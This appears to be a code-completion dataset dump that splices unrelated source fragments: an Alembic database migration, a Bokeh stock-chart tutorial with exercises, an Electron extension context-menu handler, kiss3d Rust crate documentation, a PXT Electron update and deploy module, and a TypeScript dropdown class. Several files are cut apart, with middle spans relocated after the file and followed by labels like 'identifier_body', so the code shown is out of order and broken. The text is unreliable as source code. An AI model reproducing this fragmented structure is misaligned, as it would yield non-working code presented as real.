if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone')
| op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))" | conditional_block |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
| op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone') | identifier_body |
|
stocks.py | import numpy as np
import pandas as pd
from bokeh.plotting import * | "http://ichart.yahoo.com/table.csv?s=AAPL&a=0&b=1&c=2000",
parse_dates=['Date'])
GOOG = pd.read_csv(
"http://ichart.yahoo.com/table.csv?s=GOOG&a=0&b=1&c=2000",
parse_dates=['Date'])
MSFT = pd.read_csv(
"http://ichart.yahoo.com/table.csv?s=MSFT&a=0&b=1&c=2000",
parse_dates=['Date'])
IBM = pd.read_csv(
"http://ichart.yahoo.com/table.csv?s=IBM&a=0&b=1&c=2000",
parse_dates=['Date'])
output_file("stocks.html", title="stocks.py example")
# EXERCISE: turn on plot hold
# EXERCISE: finish this line plot, and add more for the other stocks. Each one should
# have a legend, and its own color.
line(
AAPL['Date'], # x coordinates
AAPL['Adj Close'], # y coordinates
color='#A6CEE3', # set a color for the line
legend='AAPL', # attach a legend label
x_axis_type = "datetime", # NOTE: only needed on first
tools="pan,wheel_zoom,box_zoom,reset,previewsave" # NOTE: only needed on first
)
# EXERCISE: style the plot, set a title, lighten the gridlines, etc.
# EXERCISE: start a new figure
# Here is some code to compute the 30-day moving average for AAPL
aapl = AAPL['Adj Close']
aapl_dates = AAPL['Date']
window_size = 30
window = np.ones(window_size)/float(window_size)
aapl_avg = np.convolve(aapl, window, 'same')
# EXERCISE: plot a scatter of circles for the individual AAPL prices with legend
# 'close'. Remember to set the x axis type and tools on the first renderer.
# EXERCISE: plot a line of the AAPL moving average data with the legend 'avg'
# EXERCISE: style the plot, set a title, lighten the gridlines, etc.
show() # open a browser |
# Here is some code to read in some stock data from the Yahoo Finance API
AAPL = pd.read_csv( | random_line_split |
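# A possible completion of the EXERCISE steps above -- a sketch only. It
# assumes the legacy procedural bokeh.plotting API (hold, figure, circle,
# curplot, grid) that this tutorial series targeted; newer bokeh versions
# renamed these. Each snippet belongs at the matching EXERCISE marker above,
# not appended here at the end.
hold()  # EXERCISE: turn on plot hold

# EXERCISE: one line() call per stock, each with its own color and legend
line(GOOG['Date'], GOOG['Adj Close'], color='#B2DF8A', legend='GOOG')
line(MSFT['Date'], MSFT['Adj Close'], color='#33A02C', legend='MSFT')
line(IBM['Date'], IBM['Adj Close'], color='#FB9A99', legend='IBM')

# EXERCISE: style the plot
curplot().title = "Stock Closing Prices"
grid().grid_line_alpha = 0.3

# EXERCISE: start a new figure
figure()

# EXERCISE: scatter of individual prices, then the moving-average line
circle(aapl_dates, aapl, size=4, color='#A6CEE3', alpha=0.4, legend='close',
       x_axis_type="datetime", tools="pan,wheel_zoom,box_zoom,reset,previewsave")
line(aapl_dates, aapl_avg, color='red', legend='avg')

# EXERCISE: style the plot
curplot().title = "AAPL One-Month Average"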
context-menus-main.js | const {ipcFuncMain, ipcFuncMainCb, getIpcNameFunc, sendToBackgroundPage} = require('./util-main')
const {ipcMain} = require('electron')
const getIpcName = getIpcNameFunc('ContextMenus')
const extInfos = require('../../extensionInfos')
const sharedState = require('../../sharedStateMain')
ipcMain.on('get-extension-menu',(e) => ipcMain.emit('get-extension-menu-reply', null, sharedState.extensionMenu))
ipcMain.on('chrome-context-menus-clicked', async (e, extensionId, tabId, info)=>{
sendToBackgroundPage(extensionId, getIpcName('onClicked'), info, tabId)
})
ipcFuncMainCb('contextMenus', 'create', (e, extensionId, createProperties, cb)=> {
console.log('contextMenu', 'create', extensionId, createProperties)
const manifest = extInfos[extensionId].manifest
const icon = Object.values(manifest.icons)[0]
const menuItemId = createProperties.id
if(!sharedState.extensionMenu[extensionId]) sharedState.extensionMenu[extensionId] = []
sharedState.extensionMenu[extensionId].push({properties: createProperties, menuItemId, icon})
sharedState.extensionMenu[extensionId].sort((a,b) => (a.properties.count || 99) - (b.properties.count || 99))
//TODO onClick
cb()
})
ipcFuncMain('contextMenus', 'update', (e, extensionId, id, updateProperties) => {
const menu = sharedState.extensionMenu[extensionId]
if(menu){
const item = menu.find(propeties=>propeties.id === id || propeties.menuItemId === id)
if(item) Object.assign(item.properties,updateProperties)
}
})
ipcFuncMain('contextMenus', 'remove', (e, extensionId, menuItemId) => {
const menu = sharedState.extensionMenu[extensionId]
if(menu){
const i = menu.findIndex(propeties=>propeties.menuItemId === menuItemId || propeties.id === menuItemId)
if(i != -1) menu.splice(i,1)
}
})
ipcFuncMain('contextMenus', 'removeAll', (e, extensionId) => {
console.log('contextMenu', 'removeAll', extensionId) | delete sharedState.extensionMenu[extensionId]
}) | random_line_split |
|
lib.rs | /*!
# Kiss3d
Keep It Simple, Stupid 3d graphics engine.
This library was born out of frustration with the fact that today’s 3D
graphics libraries are:
* either too low level: you have to write your own shaders, and opening a
window costs you 8 hours, 300 lines of code and 10L of coffee.
* or high level but too hard to understand/use: those are libraries made to
write beautiful animations or games. They have a lot of features; too many
if you only want to draw a few geometries on the screen.
**kiss3d** is not designed to be feature-complete or fast.
It is designed to be able to draw simple geometric figures and play with them
with one-liners.
An on-line version of this documentation is available [here](http://kiss3d.org).
## Features
Most features are one-liners.
* WASM compatibility.
* open a window with a default arc-ball camera and a point light.
* a first-person camera is available too and user-defined cameras are possible.
* display boxes, spheres, cones, cylinders, quads and lines.
* change an object color or texture.
* change an object transform (we use the [nalgebra](http://nalgebra.org) library
to do that).
* create basic post-processing effects.
As an example, having a red, rotating cube with the light attached to the camera is as simple as (NOTE: this will **not** compile when targeting WASM):
```no_run
extern crate kiss3d;
extern crate nalgebra as na;
use na::{Vector3, UnitQuaternion};
use kiss3d::window::Window;
use kiss3d::light::Light;
fn main() {
let mut window = Window::new("Kiss3d: cube");
let mut c = window.add_cube(1.0, 1.0, 1.0); |
c.set_color(1.0, 0.0, 0.0);
window.set_light(Light::StickToCamera);
let rot = UnitQuaternion::from_axis_angle(&Vector3::y_axis(), 0.014);
while window.render() {
c.prepend_to_local_rotation(&rot);
}
}
```
The same example, but that will compile for both WASM and native platforms is slightly more complicated because **kiss3d** must control the render loop:
```no_run
extern crate kiss3d;
extern crate nalgebra as na;
use kiss3d::light::Light;
use kiss3d::scene::SceneNode;
use kiss3d::window::{State, Window};
use na::{UnitQuaternion, Vector3};
struct AppState {
c: SceneNode,
rot: UnitQuaternion<f32>,
}
impl State for AppState {
fn step(&mut self, _: &mut Window) {
self.c.prepend_to_local_rotation(&self.rot)
}
}
fn main() {
let mut window = Window::new("Kiss3d: wasm example");
let mut c = window.add_cube(1.0, 1.0, 1.0);
c.set_color(1.0, 0.0, 0.0);
window.set_light(Light::StickToCamera);
let rot = UnitQuaternion::from_axis_angle(&Vector3::y_axis(), 0.014);
let state = AppState { c, rot };
window.render_loop(state)
}
```
Some controls are handled by default by the engine (they can be overridden by the user, as sketched after this list):
* `scroll`: zoom in / zoom out.
* `left click + drag`: look around.
* `right click + drag`: translate the view point.
* `enter`: look at the origin (0.0, 0.0, 0.0).
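To override or extend those defaults, poll the window's event manager each
frame. The sketch below is only illustrative and assumes kiss3d's event API
(`window.events()`, `WindowEvent`, `Key`, `Action` and the per-event
`inhibited` flag); check the `event` module docs for the exact variants:

```no_run
extern crate kiss3d;

use kiss3d::event::{Action, Key, WindowEvent};
use kiss3d::window::Window;

fn main() {
    let mut window = Window::new("Kiss3d: custom controls");

    while window.render() {
        for mut event in window.events().iter() {
            match event.value {
                WindowEvent::Key(Key::Space, Action::Press, _) => {
                    println!("space pressed; running a custom handler");
                    // Prevent the engine's default handling of this event.
                    event.inhibited = true;
                }
                _ => {}
            }
        }
    }
}
```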
## Compilation
You will need the last stable build of the [rust compiler](http://www.rust-lang.org)
and the official package manager: [cargo](https://github.com/rust-lang/cargo).
Simply add the following to your `Cargo.toml` file:
```text
[dependencies]
kiss3d = "0.24"
```
## Contributions
I’d love to see people improving this library for their own needs. However, keep in mind that
**kiss3d** is KISS. One-liner features (from the user’s point of view) are preferred.
## Acknowledgements
Thanks to all the Rustaceans for their help, and their OpenGL bindings.
*/
#![deny(non_camel_case_types)]
#![deny(unused_parens)]
#![allow(non_upper_case_globals)]
#![deny(unused_qualifications)]
#![warn(missing_docs)] // FIXME: should be denied.
#![warn(unused_results)]
#![allow(unused_unsafe)] // FIXME: should be denied
#![allow(missing_copy_implementations)]
#![doc(html_root_url = "http://kiss3d.org/doc")]
#[macro_use]
extern crate bitflags;
extern crate nalgebra as na;
extern crate num_traits as num;
extern crate rusttype;
#[macro_use]
extern crate serde_derive;
extern crate serde;
#[cfg(feature = "conrod")]
pub extern crate conrod_core as conrod;
#[cfg(not(target_arch = "wasm32"))]
extern crate glutin;
extern crate instant;
#[cfg(feature = "conrod")]
pub use conrod::widget_ids;
pub use nalgebra;
pub use ncollide3d;
#[deprecated(note = "Use the `renderer` module instead.")]
pub use crate::renderer::line_renderer;
#[deprecated(note = "Use the `renderer` module instead.")]
pub use crate::renderer::point_renderer;
pub mod builtin;
pub mod camera;
pub mod context;
mod error;
pub mod event;
pub mod light;
pub mod loader;
pub mod planar_camera;
pub mod planar_line_renderer;
pub mod post_processing;
pub mod renderer;
pub mod resource;
pub mod scene;
pub mod text;
pub mod window; | random_line_split |
|
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function initElectron(projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
core.infoNotification(lf("An update will take effect after the app restarts"))
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
                });
                break;
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
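// Deferred promise bridging the drive-deploy IPC round-trip; it is resolved
// or rejected by the onDriveDeployResult handler registered in initElectron.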
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> |
export function openDevTools(): void {
if (pxtElectron) {
pxtElectron.sendOpenDevTools();
}
} | {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult);
}
if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
} | identifier_body |
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function | (projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
core.infoNotification(lf("An update will take effect after the app restarts"))
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
                });
                break;
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
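// Tracks the drive deploy currently in flight; it is resolved or rejected
// by the onDriveDeployResult handler registered in initElectron.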
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult);
}
if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
}
export function openDevTools(): void {
if (pxtElectron) {
pxtElectron.sendOpenDevTools();
}
} | initElectron | identifier_name |
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function initElectron(projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
        core.infoNotification(lf("An update will take effect after the app restarts"));
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
                });
                break;
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
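// Tracks the drive deploy currently in flight; it is resolved or rejected
// by the onDriveDeployResult handler registered in initElectron.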
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult);
}
if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
}
export function openDevTools(): void {
if (pxtElectron) |
} | {
pxtElectron.sendOpenDevTools();
} | conditional_block |
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function initElectron(projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
        core.infoNotification(lf("An update will take effect after the app restarts"));
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
                });
                break;
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
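// Tracks the drive deploy currently in flight; it is resolved or rejected
// by the onDriveDeployResult handler registered in initElectron.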
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult); | if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
}
export function openDevTools(): void {
if (pxtElectron) {
pxtElectron.sendOpenDevTools();
}
} | }
| random_line_split |
DropdownMenu.ts | export default class DropDownMenu {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void |
    private changeToggleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up");
if (openIcon) {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
}
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
}
| {
        this.changeToggleIcon();
this.root.classList.toggle("neos-dropdown-open");
} | identifier_body |
DropdownMenu.ts | export default class DropDownMenu {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void {
        this.changeToggleIcon();
this.root.classList.toggle("neos-dropdown-open");
}
    private changeToggleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up");
if (openIcon) |
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
}
| {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
} | conditional_block |
DropdownMenu.ts | export default class DropDownMenu {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void {
this.changeToogleIcon();
this.root.classList.toggle("neos-dropdown-open");
} | if (openIcon) {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
}
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
} |
private changeToogleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up"); | random_line_split |
DropdownMenu.ts | export default class | {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void {
        this.changeToggleIcon();
this.root.classList.toggle("neos-dropdown-open");
}
